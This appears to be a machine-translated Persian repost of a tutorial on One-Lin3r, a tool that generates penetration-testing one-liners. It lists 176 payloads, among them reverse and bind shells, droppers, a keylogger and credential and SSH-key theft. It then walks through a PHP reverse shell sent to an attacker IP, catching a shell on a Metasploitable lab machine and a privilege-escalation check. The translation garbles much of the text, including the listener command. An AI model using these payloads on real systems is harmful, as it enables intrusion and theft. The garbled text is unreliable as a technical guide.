چگونه به استفاده از یک Lin3r به سرعت تولید معکوس پوسته Privesc دستورات و بیشتر

زمان زیادی را می توان تلف انجام کارهای بی اهمیت و بیش از دوباره و آن را به ویژه هنگامی که آن را می آید به هک

توسط PATRIS-MUSIC در 2 تیر 1399

زمان زیادی را می توان تلف انجام کارهای بی اهمیت و بیش از دوباره و آن را به ویژه هنگامی که آن را می آید به هک و تست نفوذ. تلاش پوسته های مختلف برای خود یک هدف و تست کردن privilege escalation دستورات پس از آن می تواند مقدار زیادی از زمان. وجود دارد یک ابزار به نام یک Lin3r است که می تواند به سرعت تولید پوسته privesc دستورات و بیشتر.

یک Lin3r یک پایتون ابزار است که به عنوان یک چارچوب به طور خودکار تولید یک آستر معمولا استفاده می شود در pentesting و نرم. استفاده از آن بسیار شبیه به Metasploit پس از آن طبیعی و ساده را انتخاب کنید تا برای اکثر مردم است. این ابزار شامل ویژگی های از قبیل تکمیل خودکار جستجو پیشنهاد خودکار کپی کردن و هوشمند جستجو, ساخت آن را یک نسیم به پیدا کردن آنچه شما دنبال آن هستید.

در این آموزش ما خواهد بود با استفاده از Metasploitable 2 به عنوان هدف و Kali Linux به عنوان یک ماشین محلی است. شما می توانید با استفاده از یک شبیه راه اندازی به دنبال همراه. هنگامی که ما رسیدن به مرحله 6 زیر همه چیز متفاوت خواهد بود که یک بوش شما را انتخاب کنید تا همه چیز می تواند بسیار متفاوت از ما فقط نشان دادن چند نمونه در اینجا.

مرحله 1: نصب یک Lin3r

اولین چیزی که ما باید انجام دهید این است که نصب یک Lin3r. آن نیاز به پایتون 3 بنابراین ساده ترین راه برای انجام این کار است با pip3. آن را نصب ابزار همراه با هر گونه وابستگی و نیاز به آن ممکن است. اگر شما لازم نیست که pip3 شما می توانید آن را نصب کنید با:

~# apt نصب python3-pip Reading package lists... انجام می شود
ساختمان وابستگی درخت
خواندن اطلاعات دولتی انجام می شود... زیر بسته های اضافی نصب خواهد شد:
python-pip-whl
زیر بسته خواهد شد به روز رسانی: python-pip-whl python3-pip
2 به روز رسانی, 0 تازگی نصب شده 0 برای حذف و 500 به روز رسانی نشده است.
نیاز به 2,054 kB بایگانی.
پس از این عملیات 125 kB فضای دیسک را آزاد شود.
آیا شما می خواهید ادامه دهید ؟ [Y/n] y
دریافت:1 http://kali.download/kali kali-نورد/main amd64 python3-pip همه 20.0.2-5kali1 [211 kB]
دریافت:2 http://kali.download/kali kali-نورد/main amd64, python-pip-whl همه 20.0.2-5kali1 [1,842 kB]
ذهن 2,054 kB در 1s (2,792 kB/s)
خواندن تغییرات انجام می شود... (خواندن از پایگاه داده ... 358625 فایل ها و دایرکتوری ها در حال حاضر نصب شده است.)
آماده سازی برای باز کردن .../python3-pip_20.0.2-5kali1_all.دب ...
نامید python3-pip (20.0.2-5kali1) بیش از (20.0.2-5) ...
آماده سازی برای باز کردن .../python-pip-whl_20.0.2-5kali1_all.دب ...
نامید, python-pip-whl (20.0.2-5kali1) بیش از (20.0.2-5) ...
راه اندازی python-pip-whl (20.0.2-5kali1) ...
راه اندازی python3-pip (20.0.2-5kali1) ...
پردازش محرک برای مرد-db (2.9.1-1) ...
پردازش محرک برای kali-منو (2020.2.2) ...

سپس به نصب یک Lin3r استفاده کنید:

~# pip3 نصب یک lin3r جمع آوری یک lin3r دانلود one-lin3r-2.1.tar.gz (530 kB) |████████████████████████████████| 530 kB 1.1 MB/s
مورد نیاز در حال حاضر راضی: prompt_toolkit در /usr/lib/python3/dist-بسته (از یک lin3r) (3.0.5)
مورد نیاز در حال حاضر راضی: pyperclip در /usr/lib/python3/dist-بسته (از یک lin3r) (1.8.0)
جمع آوری terminaltables دانلود terminaltables-3.1.0.tar.gz (12 kB)
ساختمان چرخ برای جمع آوری بسته: یک lin3r, terminaltables ساختمان چرخ برای یک lin3r (setup.py) ... انجام می شود ایجاد شده چرخ برای یک lin3r: filename=one_lin3r-2.1-py3-هیچ کدام-هر.whl size=98517 sha256=4a8b3602329c770cb1c5a0af6fce25068e1c6ca9298c0b1dbee469856f67f403 ذخیره شده در دایرکتوری: /خانه/کالی/.کش/پیپ/چرخ/77/05/5a/6cfde98092f3a965cbc9b34ceacdaa306f7860238ace2b507e ساختمان چرخ برای terminaltables (setup.py) ... انجام می شود ایجاد شده چرخ برای terminaltables: filename=terminaltables-3.1.0-py3-هیچ کدام-هر.whl size=15354 sha256=d27bd634201dfb06449264a7bf3eea578bdff2b786b6923bb44ee9f9e8908d7f ذخیره شده در دایرکتوری: /خانه/کالی/.کش/پیپ/چرخ/08/8f/5f/253d0105a55bd84ee61ef0d37dbf70421e61e0cd70cef7c5e1
با موفقیت ساخته شده است یک lin3r terminaltables
نصب و جمع آوری بسته های: terminaltables یک lin3r
با موفقیت نصب یک lin3r-2.1 terminaltables-3.1.0

اگر شما یک هشدار در مورد چگونه یک lin3r نصب شده است در یک دایرکتوری که در مسیر باز خود را ~/.فایل bashrc در یک ویرایشگر متن مانند نانو و یا vim و اضافه کردن "export PATH=$PATH:/" به دنبال مسیر اسکریپت در انتهای فایل و ذخیره آن.

مرحله 2: دریافت به دانستن آن استفاده اساسی

در حال حاضر ما می تواند اجرا پایه کمک منو با ضمیمه در -h پرچم:

~# یکی-lin3r -h طریقه استفاده: One-Lin3r.py [-h] [-r R] [-x X] [q] اختیاری استدلال: -h, --help نشان می دهد این کمک پیام و خروج -r R اجرای یک فایل منبع. -x X اجرای یک فرمان خاص (استفاده برای تقسیم عددی بر مضرب). -q حالت آرام (بدون بنر).

یک Lin3r یک چارچوب بنابراین واقعا به آن ما نیاز به آن را راه اندازی. به سادگی نوع یک-lin3r در ترمینال برای انجام این کار:

~# یکی-lin3r zeeeeee-
z$$$$$$"
d$$$$$$"
d$$$$$P
d$$$$$P
$$$$$$"
.$$$$$$"
.$$$$$$"
4$$$$$$$$$$$$$"
z$$$$$$$$$$$$$" """""""3$$$$$"
z$$$$P d$$$$" یک Lin3r توسط D4Vinci - V2.1 .$$$$$" یک چارچوب که در آن همه خود را آستر متعلق به... z$$$$$" لود 176 بوش(s).
z$$$$P
d$$$$$$$$$$"
*******$$$"
.$$$"
.$$"
4$P"
z$"
zP
z"
/
^ OneLiner >

پس از آن شروع می شود ما استقبال با یک بنر بسیار شبیه به آنچه اتفاق می افتد زمانی که شروع Metasploit Framework. در واقع بسیاری از دستورات و نحوه استفاده از این ابزار بسیار شبیه به Metasploit بنابراین بسیاری از ما باید در خانه احساس.

تایپ کردن به کمک و یا ? خواهد به ما کمک دقیق منو:

OneLiner > ? توضیحات / کنترل فرمان -------- ------------- کمک/? نشان می دهد این منو کمک. لیست/نمایش لیست همه یک آستر در پایگاه داده است. جستجو [کلمات کلیدی..] جستجو در پایگاه داده برای یک خاص بوش با آن نام و نام خانوادگی نویسنده نام و یا توضیحات. استفاده از <خط> استفاده از یک موجود one-liner. کپی <خط> استفاده از یک موجود یک بوش و کپی آن را به کلیپ بورد به صورت خودکار. اطلاعات <بوش> دریافت اطلاعات در مورد یک موجود بوش. مجموعه <متغیر> <value> مجموعه یک زمینه خاص متغیر به یک ارزش به استفاده از در حالی که با استفاده از یک آستر. متغیرهای چاپ تمام قبلا مشخص شده متغیر است. بنر نمایش بنر. بازنگری/refresh بازنگری آستر پایگاه داده. چک چاپ نسخه هسته و چک اگر شما تا به تاریخ. تاریخچه نمایش خط فرمان مهم تاریخ از ابتدا. makerc صرفه جویی در خط فرمان تاریخچه به یک فایل. منابع <file> اجرای دستورات ذخیره شده در یک فایل سیستم عامل <command> اجرای سیستم فرمان بدون بستن چارچوب خروج/ترک خروج از چارچوب

پس ما محدود به چارچوب بی درنگ در حالی که در حال اجرا یک Lin3r آن را مفید قادر به اجرای سیستم عامل دستورات در حالی که مشغول به کار است. استفاده از سیستم عامل کلیدی به دنبال هر دستور شما می خواهید برای اجرای به انجام این کار. به عنوان مثال:

OneLiner > سیستم عامل uname -a لینوکس کالی 5.5.0-kali2-amd64 #1 SMP دبیان 5.5.17-1kali1 (2020-04-21) x86_64 گنو/لینوکس

مرحله 3: لیست یک آستر

ما می توانیم با استفاده از لیست فرمان برای نمایش همه موجود در یک آستر ابزار ارائه کرده است. آن را به لیست نام و مربوط به عملکرد هر یک از. همانطور که از 16 ژوئن 2020 وجود دارد 176 یک آستر در دسترس است.

OneLiner > لیست # | نام | تابع
-----+-------------------------------------------------------------+-------------------- 1 | لینوکس/awk/reverse_udp | معکوس پوسته 2 | لینوکس/awk/bind_tcp | اتصال پوسته 3 | لینوکس/awk/reverse_tcp | معکوس پوسته 4 | لینوکس/ncat/reverse_udp | معکوس پوسته 5 | لینوکس/ncat/reverse_tcp_ssl | معکوس پوسته 6 | لینوکس/ncat/reverse_tcp | معکوس پوسته 7 | لینوکس/openssl/reverse_tcp | معکوس پوسته 8 | لینوکس/nodejs/reverse_tcp | معکوس پوسته 9 | لینوکس/nc/reverse_udp | معکوس پوسته 10 | لینوکس/nc/reverse_tcp_mknod | معکوس پوسته 11 | لینوکس/nc/bind_tcp | اتصال پوسته 12 | لینوکس/nc/reverse_tcp_mkfifo | معکوس پوسته 13 | لینوکس/nc/bind_tcp_mkfifo | اتصال پوسته 14 | linux/nc/reverse_tcp | معکوس پوسته 15 | لینوکس/go/reverse_tcp | معکوس پوسته 16 | linux/java/reverse_tcp | معکوس پوسته 17 | لینوکس/perl/bind_udp | اتصال پوسته 18 | لینوکس/perl/reverse_udp_miosocket | معکوس پوسته 19 | لینوکس/perl/bind_tcp | اتصال پوسته 20 | لینوکس/perl/reverse_tcp_miosocket | معکوس پوسته 21 | لینوکس/perl/reverse_tcp | معکوس پوسته 22 | لینوکس/python/reverse_udp | معکوس پوسته 23 | لینوکس/python/bind_udp | اتصال پوسته 24 | لینوکس/python/http_server | Dropper 25 | لینوکس/python/bind_tcp | اتصال پوسته 26 | لینوکس/python/reverse_tcp_interactive | معکوس پوسته 27 | لینوکس/python/reverse_tcp | معکوس پوسته 28 | لینوکس/php/bind_udp | اتصال پوسته 29 | لینوکس/php/bind_tcp | اتصال پوسته 30 | لینوکس/php/reverse_tcp | معکوس پوسته 31 | لینوکس/telnet/reverse_tcp_mknod | معکوس پوسته 32 | لینوکس/telnet/reverse_tcp_mkfifo | معکوس پوسته 33 | لینوکس/lua/reverse_tcp_bash | معکوس پوسته 34 | لینوکس/lua/reverse_tcp | معکوس پوسته 35 | لینوکس/یاقوت/bind_udp | اتصال پوسته 36 | لینوکس/یاقوت/bind_tcp | اتصال پوسته 37 | لینوکس/یاقوت/reverse_tcp | معکوس پوسته 38 | لینوکس/socat/bind_udp | اتصال پوسته 39 | لینوکس/socat/reverse_tcp | معکوس پوسته 40 | لینوکس/باش/list_cronjobs_for_current_user | PrivEsc 41 | لینوکس/باش/get_bash_history_for_all_user | PrivEsc 42 | لینوکس/باش/search_for_writeable_folders_files | PrivEsc 43 | لینوکس/باش/search_for_password_using_grep | PrivEsc 44 | لینوکس/باش/find_suid | PrivEsc 45 | لینوکس/باش/get_ssh_private_keys_for_all_users | PrivEsc 46 | لینوکس/باش/get_apache_site_enabled | PrivEsc 47 | لینوکس/باش/get_aws_security_credentials | PrivEsc 48 | لینوکس/باش/search_for_password_using_find | PrivEsc 49 | لینوکس/باش/list_systemd_timers | PrivEsc 50 | لینوکس/باش/reverse_tcp_exec | معکوس پوسته 51 | لینوکس/باش/search_for_password_in_memory | PrivEsc 52 | لینوکس/باش/exploit_writeable_sudoers | PrivEsc 53 | لینوکس/باش/get_last_edited_files | PrivEsc 54 | لینوکس/باش/list_all_capabilities | PrivEsc 55 | لینوکس/باش/reverse_tcp | معکوس پوسته 56 | لینوکس/باش/list_cronjobs_for_all_users | PrivEsc 57 | لینوکس/باش/exploit_docker_bash_container | PrivEsc 58 | لینوکس/باش/list_cronjobs_for_another_user | PrivEsc 59 | لینوکس/tclsh/reverse_tcp | معکوس پوسته 60 | چند/msfvenom/linux_elf_reverse_meterpreter | Msfvenom ژنراتور 61 | چند/msfvenom/java_jsp_reverse_shell | Msfvenom ژنراتور 62 | چند/msfvenom/windows_asp_reverse_meterpreter | Msfvenom ژنراتور 63 | چند/msfvenom/unix_perl_reverse_shell | Msfvenom ژنراتور 64 | چند/msfvenom/php_reverse_meterpreter | Msfvenom ژنراتور 65 | چند/msfvenom/unix_python_reverse_shell | Msfvenom ژنراتور 66 | چند/msfvenom/unix_bash_reverse_shell | Msfvenom ژنراتور 67 | چند/msfvenom/windows_exe_reverse_meterpreter | Msfvenom ژنراتور 68 | چند/msfvenom/java_war_reverse_shell | Msfvenom ژنراتور 69 | چند/msfvenom/osx_macho_reverse_shell | Msfvenom ژنراتور 70 | چند/nmap/ftp_bruteforce | Nmap اسکریپت 71 | چند/nmap/http_enumerate | Nmap اسکریپت 72 | چند/nmap/full_vulnerability_scan | Nmap اسکریپت 73 | چند/nmap/google_malware_check | Nmap اسکریپت 74 | چند/nmap/common_malware_scan | Nmap اسکریپت 75 | چند/nmap/slowloris_attack | Nmap اسکریپت 76 | ویندوز/cmd/dll_dropper_rundll32 | Dropper 77 | ویندوز/cmd/win_remote_management | اجرای 78 | ویندوز/cmd/search_for_passwords | PrivEsc 79 | ویندوز/cmd/exe_dropper_bitsadmin | Dropper 80 | ویندوز/cmd/read_registry_winlogon_key | PrivEsc 81 | ویندوز/cmd/list_scheduled_tasks | PrivEsc 82 | ویندوز/cmd/exe_dropper_certutil | Dropper 83 | ویندوز/cmd/read_registry_runonce_key | PrivEsc 84 | ویندوز/cmd/list_arp_tables | PrivEsc 85 | ویندوز/cmd/runas_with_creds | اجرای 86 | ویندوز/cmd/list_processes_running_as_system | PrivEsc 87 | ویندوز/cmd/read_registry_always_install_elevated_key_lm | PrivEsc 88 | ویندوز/cmd/list_localgroups | PrivEsc 89 | ویندوز/cmd/hta_dropper_mshta | Dropper 90 | ویندوز/cmd/list_startup_folder_currentuser | PrivEsc 91 | ویندوز/cmd/read_registry_always_install_elevated_key_cu | PrivEsc 92 | ویندوز/cmd/read_firewall_config | PrivEsc 93 | ویندوز/cmd/list_logon_requirements | PrivEsc 94 | ویندوز/cmd/get_systeminfo | PrivEsc 95 | ویندوز/cmd/list_routing_tables | PrivEsc 96 | ویندوز/cmd/read_registry_putty_sessions | PrivEsc 97 | ویندوز/cmd/search_registry_for_passwords_lm | PrivEsc 98 | ویندوز/cmd/list_startup_folder_allusers | PrivEsc 99 | ویندوز/cmd/read_registry_vnc_passwords | PrivEsc 100 | ویندوز/cmd/xsl_dropper_wmic | Dropper 101 | ویندوز/cmd/list_network_shares | PrivEsc 102 | ویندوز/cmd/sct_dropper_rundll32 | Dropper 103 | ویندوز/cmd/search_registry_for_passwords_cu | PrivEsc 104 | ویندوز/cmd/msi_quiet_installer | اجرای 105 | ویندوز/cmd/get_saved_wifi_passwords | PrivEsc 106 | ویندوز/cmd/sct_dropper_regsvr32 | Dropper 107 | ویندوز/cmd/bat_dropper | Dropper 108 | ویندوز/cmd/list_installed_updates | PrivEsc 109 | ویندوز/cmd/list_users | PrivEsc 110 | ویندوز/cmd/list_running_processes | PrivEsc 111 | ویندوز/cmd/dll_dropper_regasm | Dropper 112 | ویندوز/cmd/execute_over_forfiles | اجرای 113 | ویندوز/cmd/list_user_privileges | PrivEsc 114 | ویندوز/cmd/read_services_with_wmic | PrivEsc 115 | ویندوز/cmd/get_snmp_config | PrivEsc 116 | ویندوز/cmd/sct_dropper_mshta | Dropper 117 | ویندوز/cmd/get_architecture | PrivEsc 118 | ویندوز/cmd/read_services_with_tasklist | PrivEsc 119 | ویندوز/cmd/read_registry_snmp_key | PrivEsc 120 | ویندوز/cmd/list_current_connections | PrivEsc 121 | ویندوز/cmd/dll_dropper_certutil_base64 | Dropper 122 | ویندوز/cmd/read_registry_run_key | PrivEsc 123 | ویندوز/cmd/list_unqouted_services | PrivEsc 124 | ویندوز/cmd/execute_c#_files | اجرای 125 | ویندوز/cmd/list_drives | PrivEsc 126 | ویندوز/cmd/disable_firewall_netsh | PrivEsc 127 | ویندوز/cmd/list_network_interfaces | PrivEsc 128 | ویندوز/cmd/msi_dropper_wininstaller | Dropper 129 | ویندوز/cmd/dll_loader_control_panel | لودر 130 | ویندوز/cmd/read_registry_r_key | PrivEsc 131 | ویندوز/cmd/list_startup_tasks_with_wmic | PrivEsc 132 | ویندوز/cmd/dll_loader_word | لودر 133 | ویندوز/cmd/get_saved_wifi_aps_ssid | PrivEsc 134 | ویندوز/اسکن/check_netapi | Nmap اسکریپت 135 | ویندوز/اسکن/check_eternal_blue | Nmap اسکریپت 136 | ویندوز/wsl/runas_with_creds | اجرای 137 | ویندوز/nc/bind_tcp | اتصال پوسته 138 | ویندوز/nc/reverse_tcp | معکوس پوسته 139 | ویندوز/perl/bind_udp | اتصال پوسته 140 | ویندوز/perl/bind_tcp | اتصال پوسته 141 | ویندوز/perl/reverse_tcp | معکوس پوسته 142 | ویندوز/groovysh/reverse_tcp | معکوس پوسته 143 | ویندوز/python/bind_udp | اتصال پوسته 144 | ویندوز/python/bind_tcp | اتصال پوسته 145 | ویندوز/python/reverse_tcp_threaded | معکوس پوسته 146 | ویندوز/python/reverse_tcp | معکوس پوسته 147 | ویندوز/php/bind_udp | اتصال پوسته 148 | ویندوز/php/bind_tcp | اتصال پوسته 149 | ویندوز/lua/reverse_tcp | معکوس پوسته 150 | ویندوز/یاقوت/bind_udp | اتصال پوسته 151 | ویندوز/یاقوت/bind_tcp | اتصال پوسته 152 | ویندوز/یاقوت/reverse_tcp | معکوس پوسته 153 | ویندوز/powershell/list_installed_programs_using_folders | PrivEsc 154 | ویندوز/powershell/list_scheduled_tasks | PrivEsc 155 | ویندوز/powershell/list_arp_tables | PrivEsc 156 | ویندوز/powershell/get_iis_config | PrivEsc 157 | ویندوز/powershell/ps1_dropper | Dropper 158 | ویندوز/powershell/setup_powerup_powertools | PrivEsc 159 | ویندوز/powershell/reverse_tcp_string | معکوس پوسته 160 | ویندوز/powershell/list_routing_tables | PrivEsc 161 | ویندوز/powershell/bind_tcp | اتصال پوسته 162 | ویندوز/powershell/get_saved_wifi_passwords | PrivEsc 163 | ویندوز/powershell/list_installed_programs_using_registry | PrivEsc 164 | ویندوز/powershell/list_running_processes | PrivEsc 165 | ویندوز/powershell/meterpreter_shell | معکوس پوسته 166 | ویندوز/powershell/setup_session_gopher | PrivEsc 167 | ویندوز/powershell/list_unqouted_services | PrivEsc 168 | ویندوز/powershell/setup_keylogger_powersploit | Keylogger 169 | ویندوز/powershell/get_passwords_from_memory_using_mimikatz | PrivEsc 170 | ویندوز/powershell/ps1_dropper_rundll32 | Dropper 171 | ویندوز/powershell/reverse_tcp | معکوس پوسته 172 | ویندوز/powershell/list_network_interfaces | PrivEsc 173 | ویندوز/powershell/ps1_dropper_microsoft_syncappv | Dropper 174 | openbsd/nc/bind_udp | اتصال پوسته 175 | openbsd/nc/reverse_tcp | معکوس پوسته 176 | openbsd/باش/read_doas_config | PrivEsc

گام 4: جستجو برای یک بوش

ما همچنین می توانید جستجو برای موارد خاص با استفاده از جستجو در فرمان. این چیزی است که یک Lin3r است که واقعا خوب است. آن را نه تنها تکمیل خودکار قابلیت, اما آن را نیز می داند آنچه شما در حال تلاش برای جستجو با ارائه پیشنهادات و اجازه می دهد جزئی عبارات جستجو.

برای مثال اجازه دهید می گویند ما می خواستم به نوعی از پوسته پی اچ پی برای لینوکس. ما نیازی به تایپ مسیر کامل ابزار برای پیدا کردن آنچه ما به دنبال.

OneLiner > جستجو لینوکس php # | نام | تابع
-----+-----------------------+--------------- 1 | لینوکس/php/bind_udp | اتصال پوسته 2 | لینوکس/php/bind_tcp | اتصال پوسته 3 | لینوکس/php/reverse_tcp | معکوس پوسته

گام 5: دریافت اطلاعات بیشتر در مورد یک بوش

ما می توانید اطلاعات مورد خاص یک بوش با اطلاعات فرمان است که ما را از شرح کوتاه از اقلام از جمله نویسنده آن تابع و متغیر استفاده می شود که.

OneLiner > اطلاعات در لینوکس/php/reverse_tcp [+] بوش اضافه شده توسط => vesche
[+] تابع => معکوس پوسته
[+] متغیر استفاده می شود => هدف, درگاه
[+] توضیحات => با استفاده از PHP سوکت & exec برای ایجاد یک پوسته معکوس.

مرحله 6: بار هر یک بوش

یک بار ما در بر داشت مناسب, مورد, ما می توانید آن را با استفاده از فرمان. من با استفاده از معکوس پوسته به عنوان مثال. هنگامی که ما انجام این کار, آن را به ما بدهد واقعی خط است که ما نیاز به کپی و اجرا کنید.

OneLiner > استفاده از لینوکس/php/reverse_tcp [+] خود بوش است: php -r '$sock=fsockopen("TARGET",PORT);exec("/bin/sh -i <&3 >&3 2>&3");'

گام 7: لیست و مجموعه متغیرهای

در این مثال ما می توانید ببینید وجود دارد پارامترهای هدف و پورت. برای نمایش زمان و متغیرهای مرتبط با آن ارزش ها به سادگی نوع متغیر سریع:

OneLiner > متغیر # | نام | ارزش
---+-----------+------- 1 | TARGET | None 2 | بندر | None 3 | URL | None 4 | فرماندهی | None 5 | FILE_PATH | None 6 | نام کاربری | None 7 | رمز عبور | None

در حال حاضر ما قادر به تعیین مقادیر این متغیرها بسیار شبیه چگونه ما در Metasploit. از آنجا که ما در حال تولید یک پوسته معکوس در اینجا ما نیاز به تنظیم هدف به آدرس IP محلی ما ماشین:

OneLiner > مجموعه هدف 10.10.0.1 [+] متغیر هدف مجموعه به 10.10.0.1

و پورت مورد نظر پس از آن می توانید به ما شنونده:

OneLiner > تنظیم پورت 4321 [+] متغیر پورت تنظیم به 4321

در حال حاضر هنگامی که ما نمایش متغیرهای دوباره ما می توانید ببینید که ما ارزش های مجموعه:

OneLiner > متغیر # | نام | ارزش
---+-----------+----------- 1 | TARGET | 10.10.0.1 2 | بندر | 4321 3 | URL | None 4 | فرماندهی | None 5 | FILE_PATH | None 6 | نام کاربری | None 7 | رمز عبور | None

مرحله 8: با استفاده از یک انتخاب-بوش

بیایید سعی کنید این. اول ما نیاز به راه اندازی یک شنونده بنابراین ما می توانید گرفتن ورودی اتصال از هدف. راحت است که همیشه یک انتخاب خوب است که ما می خواهم به استفاده از در یک پنجره ترمینال:

~# nc -mozo. com. au 4321 گوش دادن در [هر] 4321 ...

بعد در یک Lin3r پنجره ترمینال بار یک بوش برای دریافت کامل فرمان. ما می توانید ببینید که هدف و پورت متغیر در حال حاضر پر شده با ارزش های ما:

OneLiner > استفاده از لینوکس/php/reverse_tcp [+] خود بوش است: php -r '$sock=fsockopen("10.10.0.1",4321);exec("/bin/sh -i <&3 >&3 2>&3");'

ما فقط می تواند کپی این فرمان معمولی اما یک Lin3r در واقع یکی از ویژگی های به طور خودکار این کار را برای ما. به جای بارگذاری یک آیتم با استفاده از دستور load آن را با کپی کردن فرمان — این به طور خودکار کپی آنچه که ما نیاز به راست به کلیپ بورد:

OneLiner > کپی لینوکس/php/reverse_tcp [+] خود بوش است: php -r '$sock=fsockopen("10.10.0.1",4321);exec("/bin/sh -i <&3 >&3 2>&3");'
[+] بوش کپی به کلیپ بورد با موفقیت!

از اینجا از آن زمان به بهره برداری هدف. در صورت تمایل به انجام این حال شما می خواهید, اما فرمان تزریق است که همیشه مورد علاقه من است. هنگامی که ما در بهره برداری از این هدف و اجرای ما معکوس پوسته فرمان ما باید یک اتصال باز کردن در محلی ما ماشین:

10.10.0.50: معکوس host lookup failed: Unknown host
اتصال به [10.10.0.1] از (UNKNOWN) [10.10.0.50] 56718
sh: هیچ کار کنترل در این پوسته
sh-3.2$ id
uid=33(www-data) gid=33(www-data) گروه=33(www-data)

ما هم اکنون می توانید اجرای دستورات مانند id به منظور بررسی ما به خطر بیافتد یک کاربر در سیستم.

گام 9: انجام Privilege Escalation

حالا که ما یک پوسته در سیستم به عنوان یک محدود کاربر گام بعدی را خواهد بود privilege escalation. خوشبختانه یک Lin3r همچنین شامل برخی از دستی privesc دستورات برای ما تولید کند.

چیزهایی اول اول, اجازه دهید, ارتقاء این پوسته ما به طور کامل تعاملی TTY جلسه پس ما باید کنترل بیشتری روی آنچه که ما در حال انجام است.

حالا که ما یک مناسب و معقول پوسته اجازه دهید پیدا کردن یک پتانسیل privesc فرمان استفاده کنید. من معمولا دوست دارم به کار در خارج از جهان-قابل نوشتن فهرست در پست-بهره برداری, بنابراین من می تواند نوشتن و اجرای هر چه من می خواهم — /var/tmp شرط خوب است:

www-data@metasploitable:/var/www/dvwa/vulnerabilities/exec$ cd /var/tmp

در حال حاضر در یک Lin3r ما می توانید برای جستجو مناسب privesc برای لینوکس:

OneLiner > جستجو لینوکس privesc # | نام | تابع
-----+-----------------------------------------------+---------- 1 | لینوکس/باش/list_cronjobs_for_current_user | PrivEsc 2 | لینوکس/باش/get_bash_history_for_all_user | PrivEsc 3 | لینوکس/باش/search_for_writeable_folders_files | PrivEsc 4 | لینوکس/باش/search_for_password_using_grep | PrivEsc 5 | لینوکس/باش/find_suid | PrivEsc 6 | لینوکس/باش/get_ssh_private_keys_for_all_users | PrivEsc 7 | لینوکس/باش/get_apache_site_enabled | PrivEsc 8 | لینوکس/باش/get_aws_security_credentials | PrivEsc 9 | لینوکس/باش/search_for_password_using_find | PrivEsc 10 | لینوکس/باش/list_systemd_timers | PrivEsc 11 | لینوکس/باش/search_for_password_in_memory | PrivEsc 12 | لینوکس/باش/exploit_writeable_sudoers | PrivEsc 13 | لینوکس/باش/get_last_edited_files | PrivEsc 14 | linux/باش/list_all_capabilities | PrivEsc 15 | لینوکس/باش/list_cronjobs_for_all_users | PrivEsc 16 | لینوکس/باش/exploit_docker_bash_container | PrivEsc 17 | لینوکس/باش/list_cronjobs_for_another_user | PrivEsc

بیایید نگاهی به این یکی که لیست هر cron jobs برای کاربر فعلی:

OneLiner > اطلاعات در لینوکس/باش/list_cronjobs_for_current_user [+] بوش اضافه شده توسط => کریم shoair (D4Vinci)
[+] تابع => PrivEsc
[+] متغیر استفاده می شود => None
[+] توضیحات => فهرست تمام crob شغل برای کاربر جاری

به نظر می رسد بسیار ساده است و ما حتی نمی نیاز به تنظیم هر متغیر است. با استفاده از کپی کردن دستور برای کپی کنید و آن را مستقیم به کلیپ بورد:

OneLiner > کپی لینوکس/باش/list_cronjobs_for_current_user [+] خود بوش است: crontab -l
[+] بوش کپی به کلیپ بورد با موفقیت!

ما می توانید ببینید که آن را هنوز هم به ما می گوید آنچه در آن تولید می کند اما ما نجات یک گام اضافی با کپی کردن این فرمان به طور خودکار. تنها چیزی که از چپ به کار است و اجرای یک بوش بر هدف:

www-data@metasploitable:/var/tmp$ crontab -l هیچ crontab برای www-data

ما می توانید ببینید در این مثال خاص وجود دارد cron jobs برای این کاربر اما یک Lin3r باعث می شود آن را آسان به برخی از رایج privesc دستورات درست در نوک انگشتان ما.

کاغذ بسته بندی

امروز ما به بررسی یک ابزار به نام یک Lin3r و نحوه استفاده از آن به سرعت تولید پوسته privilege escalation دستورات و بیشتر. ما آن را آزمایش با استفاده از PHP معکوس پوسته به سازش هدف و سپس سعی در تشدید امتیازات با تولید یک دستور برای بررسی cron jobs. با یک رابط است که احساس می کند آشنا به هر Metasploit کاربر یک Lin3r باعث می شود آن را آسان برای هک در پرواز است.

می خواهید شروع به ساختن پول به عنوان یک کلاه سفید هکر? پرش شروع خود را-کلاه سفید هک حرفه ای با ما 2020 حق بیمه هک اخلاقی, گواهینامه آموزشی از بسته نرم افزاری جدید Null Byte فروشگاه و دریافت بیش از 60 ساعت آموزش از هک اخلاقی حرفه ای است.

خرید در حال حاضر (96٪) >

تصویر جلد توسط EVG عکس/Pexels; تصاویر توسط drd_/Null Byte


tinyurlis.gdclck.ruulvis.netshrtco.de
آخرین مطالب